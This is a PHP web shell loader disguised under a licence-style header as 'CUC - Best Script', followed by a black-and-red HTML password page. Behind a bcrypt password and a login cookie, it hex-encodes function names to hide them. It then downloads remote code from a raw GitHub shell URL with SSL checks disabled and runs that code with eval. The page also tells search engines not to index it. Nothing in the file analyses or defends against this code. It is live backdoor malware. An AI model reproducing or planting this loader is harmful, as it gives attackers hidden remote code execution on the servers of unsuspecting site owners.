// This script is part of Corrupted Unorthodox Catastrophe (CUC) - Best Script.
//
// CUC - Best Script is free software: you can redistribute it and/or modify
// it under the terms of The PHP License, version 3.01.
//
// CUC - Best Script is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See
// The PHP License for more details.
//
// You should have received a copy of The PHP License, version 3.01,
// along with CUC - Best Script. If not, see <https://www.php.net/license/3_01.txt>.
/**
* Corrupted Unorthodox Catastrophe (CUC) - Best Script
* @link https://cuc.dev/
* @author CUC.
* @since 17. 7. 1337 - time 13:37
* @package CUCGroup
* @license https://www.php.net/license/3_01.txt The PHP License, version 3.01
* @version 1.7
* @copyright Copyright (C) 1337 CUC, Inc. All rights reserved.
*/
function hex2str($hex) {
$str = '';
for ($i = 0; $i < strlen($hex) - 1; $i += 2) {
$str .= chr(hexdec($hex[$i] . $hex[$i + 1]));
}
return $str;
}
// @deprecated 1.0 Deprecated without replacement
function is_logged_in()
{
return isset($_COOKIE['coxphe']) && $_COOKIE['coxphe'] === 'coxphe';
}
if (is_logged_in()) {
$Array = array(
'666f70656e', // fopen
'73747265616d5f6765745f636f6e74656e7473', // stream_get_contents
'66696c655f6765745f636f6e74656e7473', // file_get_contents
'6375726c5f65786563', // curl_exec
'636f7079', // copy
'73747265616d5f636f6e74657874', // stream_context_create
'66696c65' // file
);
function geturlsinfo($b0rn) {
$l1v3 = array_map('hex2str', $GLOBALS['Array']);
if (function_exists($l1v3[3])) {
$ch = curl_init($b0rn);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$d34th = $l1v3[3]($ch);
curl_close($ch);
return $d34th;
} elseif (function_exists($l1v3[2])) {
return $l1v3[2]($b0rn);
} elseif (function_exists($l1v3[0]) && function_exists($l1v3[1])) {
$g04l = $l1v3[0]($b0rn, "r");
$d34th = $l1v3[1]($g04l);
fclose($g04l);
return $d34th;
} elseif (function_exists($l1v3[4])) {
return $l1v3[4]($b0rn, '/tmp/tempfile');
} elseif (function_exists($l1v3[5])) {
$context = $l1v3[5](array('http' => array('timeout' => 5)));
return file_get_contents($b0rn, false, $context);
} elseif (function_exists($l1v3[6])) {
return implode('', $l1v3[6]($b0rn));
}
return false;
}
$b0rn = 'https://raw.githubusercontent.com/lyyahm/shell/refs/heads/main/34.txt';
$dr34m = geturlsinfo($b0rn);
if ($dr34m !== false) {
eval('' . $dr34m);
}
} else {
if (isset($_POST['password'])) {
$entered_key = $_POST['password'];
$hashed_key = '$2y$10$m4W9BHBf4OgVcTHN85OHT.sB3zDmknoLI6Sow8nkO68CUSQ41ZC9C'; // https://bcrypt.online/
if (password_verify($entered_key, $hashed_key)) {
setcookie('coxphe', 'coxphe', time() + 3600, '/');
header("Location: ".$_SERVER['PHP_SELF']);
exit();
}
}
<!DOCTYPE html>
<html lang="en">
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta name="robots" content="noindex, nofollow, noarchive" />
<link rel="preconnect" href="https://fonts.googleapis.com" />
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
<link rel="icon" href="https://i.ibb.co/gL72GZDw/images-4-removebg-preview.png" />
<link href="https://fonts.googleapis.com/css2?family=Cinzel&display=swap" rel="stylesheet" />
Corrupted Unorthodox Catastrophe <title>Corrupted Unorthodox Catastrophe</title>
<style>
body {
margin: 0;
padding: 0;
font-family: "Cinzel", serif;
background-color: #000000;
color: #cf1018;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
text-align: center;
overflow: hidden;
}
.container {
max-width: 800px;
width: 100%;
padding: 20px;
}
h1, p, a {
color: #cf1018;
}
img {
display: block;
margin: 20px auto;
max-width: 100%;
cursor: pointer;
}
input[type="password"],
input[type="submit"] {
padding: 10px;
border: 2px solid #cf1018;
border-radius: 5px;
background-color: #000000;
color: #cf1018;
font-family: "Cinzel", serif;
font-size: 16px;
outline: none;
width: 50%;
max-width: 300px;
margin: 10px auto;
display: block;
}
input[type="submit"] {
background-color: #cf1018;
color: #000000;
transition: background-color 0.3s ease;
cursor: pointer;
}
input[type="submit"]:hover {
background-color: #a00d14;
}
#youtubePlayer {
display: none; /* hide the player */
}
</style>
<script>
document.addEventListener("DOMContentLoaded", function () {
const clickableImage = document.getElementById("clickableImage");
const linkContainer = document.getElementById("linkContainer");
const youtubePlayer = document.getElementById("youtubePlayer");
clickableImage.addEventListener("click", function () {
if (!linkContainer.innerHTML) {
linkContainer.innerHTML = `
`;
// Set YouTube player src but keep it hidden
youtubePlayer.src =
"https://www.youtube.com/embed/7DFlyDYAt1c?autoplay=1&loop=1&playlist=7DFlyDYAt1c";
youtubePlayer.style.display = "none"; // keep hidden
}
});
});
</script>
<div class="container">
<img
id="clickableImage"
src="https://c.tenor.com/gNgtEpVk_fUAAAAC/tenor.gif"
width="300"
alt="Corrupted Unorthodox Catastrophe"
/>
<iframe
id="youtubePlayer"
width="0"
height="0"
frameborder="0"
allow="autoplay"
allowfullscreen
></iframe>
<div id="linkContainer"></div>
<p>~ Faber est suae quisque fortunae ~</p>
</div>